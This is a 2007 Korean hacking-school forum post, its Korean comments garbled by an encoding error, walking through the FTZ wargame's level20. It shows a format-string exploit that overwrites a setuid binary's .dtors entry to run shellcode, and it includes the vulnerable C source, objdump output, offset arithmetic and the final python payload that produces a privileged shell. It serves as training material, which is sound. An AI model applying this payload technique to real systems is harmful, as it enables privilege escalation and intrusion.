|
http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2581 [º¹»ç]
level20 / .dtors(destructor) ¿µ¿ªÀ» ¼öÁ¤ÇÏ¿©, ½©ÄÚµå ½ÇÇàÇϱâ.
[level20@ftz in]$ cat ~/hint
#include <stdio.h>
main(int argc,char **argv)
{ char bleh[80];
setreuid(3101,3101);
fgets(bleh,79,stdin);
printf(bleh);
}
[level20@ftz in]$ ./egg 512 300
Using address: 0xbffff95c
// constructors ¼Ó¼ºÀÇ Æã¼ÇÀº main()Àü¿¡ ½ÇÇàµÇ°í,
// destructor ¼Ó¼ºÀÇ Æã¼ÇµéÀº main()Á¾·áÈÄ¿¡ ½ÇÇàµÈ´Ù.
// ÀÌµé ¼Ó¼ºÀº ÇÁ·Î±×·¡¸Ó¿¡ ÀÇÇØ Á¤Àǵɼö ÀÖÀ¸³ª,
// Á¤ÀǵÇÁö ¾Ê´õ¶óµµ, ±× ¿µ¿ªÀº Á¸ÀçÇÑ´Ù.
[level20@ftz in]$ objdump -h ~/attackme
/home/level20/attackme: file format elf32-i386
Sections:
Idx Name Size VMA LMA File off Algn
.
.
14 .eh_frame 00000004 080484b4 080484b4 000004b4 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
15 .data 0000000c 080494b8 080494b8 000004b8 2**2
CONTENTS, ALLOC, LOAD, DATA
16 .dynamic 000000c8 080494c4 080494c4 000004c4 2**2
CONTENTS, ALLOC, LOAD, DATA
17 .ctors 00000008 0804958c 0804958c 0000058c 2**2
CONTENTS, ALLOC, LOAD, DATA
18 .dtors 00000008 08049594 08049594 00000594 2**2
CONTENTS, ALLOC, LOAD, DATA
19 .jcr 00000004 0804959c 0804959c 0000059c 2**2
CONTENTS, ALLOC, LOAD, DATA
20 .got 00000020 080495a0 080495a0 000005a0 2**2
CONTENTS, ALLOC, LOAD, DATA
[level20@ftz in]$ objdump -s -j .dtors ~/attackme
/home/level20/attackme: file format elf32-i386
Contents of section .dtors:
8049594 ffffffff 00000000 ........
/// .ctors¿Í .dtors µÑ´Ù ¾Æ·¡¿Í °°Àº ·¹À̾ƿôÀ» °®´Â´Ù.
/// 0xffffffff <function address> <another function address> ... 0x00000000
///
/// À§ °á°ú¿¡¼ ~/attackme ÀÇ .dtors¿µ¿ªÀº Á¸ÀçÇϳª,
/// function address°¡ 00000000ÀΰÍÀ¸·Î º¸¾Æ, Á¤ÀǵǾîÀÖÁö ¾ÊÀºµíÇÏ´Ù.
/// ¹Ù·Î ÀÌ 00000000ºÎºÐÀ», ½©Äڵ尡 À§Ä¡ÇÑ ÁÖ¼Ò·Î µ¤¾î¾º¾îÁÖ¸é °ø°Ý¿¡ ¼º°øÇÒ°Í °°´Ù..
/// 0x08049594 = ffffffff
/// 0x08049598 = 00000000 <-- À̺κÐÀÌ´Ù.
/// °ø°ÝÁغñ
[level20@ftz in]$ ~/attackme
AAAABBBB %x %x %x %x %x
AAAABBBB 4f 40157460 4009d500 41414141 42424242
/// À§ °á°ú·Î½á, $-flag¸¦ ÀÌ¿ëÇؼ format string°ø°ÝÀ» ÇÒ¼ö ÀÖ´Ù.
/// .dtorsÀÇ Ã¹¹ø° function address ÁÖ¼ÒÀÎ 0x08049598ÁÖ¼Ò¿¡ ½©Äڵ尡 ½ÃÀ۵Ǵ °÷ÀÇ ÁÖ¼Ò·Î µ¤¾î¾²±âÇÒ°ÍÀÌ´Ù.
Eggshell¿¡ ÀÇÇÑ ½©ÄÚµåÀÇ À§Ä¡ : Using address: 0xbffff95c
0xf95c =63836
63836-8byte = 63828
0x1bfff = 114687
114687-63836=50851
"\x98\x95\x04\x08"+"\x9a\x95\x04\x08" -- 8byte
"%63828x%4$n%50851x%5$n"
[level20@ftz in]$ (python -c 'print "\x98\x95\x04\x08"+"\x9a\x95\x04\x08"+"%63828x%4$n%50851x%5$n"';cat) | ~/attackme
..............»ý·«............................
40157460
id
uid=3101(clear) gid=3100(level20) groups=3100(level20)
my-pass
TERM environment variable not set.
clear Password is "************************".
---------------------------------------------------------------------------------------------
Âü°í¹®¼--
How to make shellcode in linux for beginners ( http://hdp.null2root.org/system/willy_sc.txt )
Format-String-Bug ÀÌÇØÇϱâ (http://badnom.com/211)
$-flag¸¦ ÀÌ¿ëÇÑ Format String °ø°Ý (http://x82.inetcop.org/h0me/papers/$-flag-formatstring.txt)
ÇØÄ¿½ºÄð Áú¹®°ú´äº¯°Ô½ÃÆÇ randomkid´ÔÀÇ ±Û (http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&page=1&sn1=&divpage=1&sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=2578)
ÇÁ·Î±×·¥ ½ÇÇà º¯°æÀ» À§ÇØ .dtors¿µ¿ª µ¤¾î ¾²±â(http://www.hackerschool.org/HS_Boards/data/Lib_system/dtor_fs.txt)
|
Hit : 3405 Date : 2007/11/23 04:03
|
2844, 
10/143 
